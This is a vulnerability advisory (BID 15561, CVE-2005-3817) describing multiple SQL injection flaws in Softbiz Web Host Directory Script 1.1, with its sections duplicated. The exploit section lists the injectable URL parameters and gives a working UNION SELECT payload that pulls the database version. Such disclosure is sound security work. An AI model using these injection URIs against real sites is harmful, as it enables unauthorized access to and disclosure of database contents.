Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
BID:15561
Info
Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 15561 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-3817 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 24 2005 12:00AM |
| Updated: | Apr 29 2010 05:23PM |
| Credit: | r0t is credited with the discovery of this vulnerability. |
| Vulnerable: |
SoftBiz Web Hosting Directory Script 1.1 |
| Not Vulnerable: | |
Discussion
Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Version 1.1 and earlier are affected; other versions may also be affected.
Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Version 1.1 and earlier are affected; other versions may also be affected.
Exploit / POC
Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
No exploit is required.
Example URIs have been provided:
http://www.example.com/search_result.php?cid=[sql]
http://www.example.com/browsecats.php?cid=[sql]
http://www.example.com/review.php?sbres_id=[sql]
http://www.example.com/email.php?&h_id=[sql]
http://www.example.com/browsecats.php?cid=2+union+select+1,version(),3,4--
No exploit is required.
Example URIs have been provided:
http://www.example.com/search_result.php?cid=[sql]
http://www.example.com/browsecats.php?cid=[sql]
http://www.example.com/review.php?sbres_id=[sql]
http://www.example.com/email.php?&h_id=[sql]
http://www.example.com/browsecats.php?cid=2+union+select+1,version(),3,4--
Solution / Fix
Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
References:
References:
- SoftBiz Web Hosting Directory Web Site (SoftBiz)
- Web Host Directory Script Multiple vuln. (rakstija r0t3d3Vil)